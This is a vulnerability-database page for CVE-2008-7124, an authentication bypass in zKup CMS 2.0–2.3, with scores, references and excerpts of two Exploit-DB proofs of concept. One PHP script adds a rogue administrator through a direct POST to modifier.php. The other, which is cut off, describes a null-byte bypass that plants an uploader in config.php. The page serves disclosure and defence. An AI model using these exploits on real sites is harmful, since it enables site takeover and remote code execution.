CVE-2008-7124
published 2009-08-31CVE-2008-7124: zKup CMS 2.0 through 2.3 does not require administrative authentication for admin/configuration/modifier.php, which allows remote attackers to gain…
PriorityP359high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
8.61%
94.4th percentile
zKup CMS 2.0 through 2.3 does not require administrative authentication for admin/configuration/modifier.php, which allows remote attackers to gain administrator privileges via a direct request, as demonstrated by adding a new administrator.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zkup | zkup | — | — |
| zkup | zkup | — | — |
| zkup | zkup | — | — |
| zkup | zkup | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
zKup CMS 2.0 < 2.3 - Remote Add Admin
exploitdb·2008-03-07
CVE-2008-7124 zKup CMS 2.0 < 2.3 - Remote Add Admin
zKup CMS 2.0
* Date: 03-08-2008
* Conditions: None.
*
* This exploit add a new zKup admin.
*
*/
print "\n";
print " zKup CMS v2.0 \n\n";
if($argc \n eg: php zkup2_admin_exploit.php http://127.0.0.1/votresite/ real p4ssw0rd";exit(-1); }
$url = $argv[1];
$log = $argv[2];
$pas = $argv[3];
$postit = "action=ajout&login=$log&mdp=$pas&mdp2=$pas&lvl=9";
print "[*] sending evil c0de ... ";
if(preg_match("#alert#i",post($url."admin/configuration/modifier.php","$postit"))) print "done.\n";
else print "failed.\n";
function post($url,$data,$get=1)
{
$result = '';
preg_match("#^http://([^/]+)(/.*)$#i",$url,$info);
$host = $info[1];
$page = $info[2];
$fp = fsockopen($host, 80, &$errno, &$errstr, 30);
$req = "POST $page HTTP/1.1\r\n";
$req .= "Host: $host\r\n";
$req .= "User-Agent: Mozilla Firefox\
Exploit-DB
zKup CMS 2.0 < 2.3 - Arbitrary File Upload
exploitdb·2008-03-07
CVE-2008-7124 zKup CMS 2.0 < 2.3 - Arbitrary File Upload
zKup CMS 2.0
* Date: 03-08-2008
* Conditions: PHP Version, magic_quotes_gpc=Off
*
* This exploit spawn a php uploader in your victim's
* server.
*
* Okay, you may need explanations:
*
* First, we can use administration without being admin
* (see ./admin/configuration/modifier.php)
*
* Then, when we add an admin, it is saved in a php file,
* named "./fichiers/config.php".
* A vuln is present when the script controls $login value,
* because it use this regex: #^[a-zA-Z0-9]+$#
* in order to see if it's alphanumerical.
* I bypassed this regex using a NULL POISON BYTE (%00),
* and writing my upload script just after.
* I finally put some lines in order not to
* corrupt config.php.
*
*/
print "\n";
print " zKup CMS v2.0 \n\n";
if($argc\n eg: php zkup2_upload_exploit.php http://127.0.0.1/votres
No writeups or analysis indexed.
http://osvdb.org/43081http://secunia.com/advisories/29276http://www.securityfocus.com/bid/28149http://www.zkup.fr/actualite-zkup/maj-critique-v203v204.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/41068https://www.exploit-db.com/exploits/5219https://www.exploit-db.com/exploits/5220http://osvdb.org/43081http://secunia.com/advisories/29276http://www.securityfocus.com/bid/28149http://www.zkup.fr/actualite-zkup/maj-critique-v203v204.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/41068https://www.exploit-db.com/exploits/5219https://www.exploit-db.com/exploits/5220
2009-08-31
Published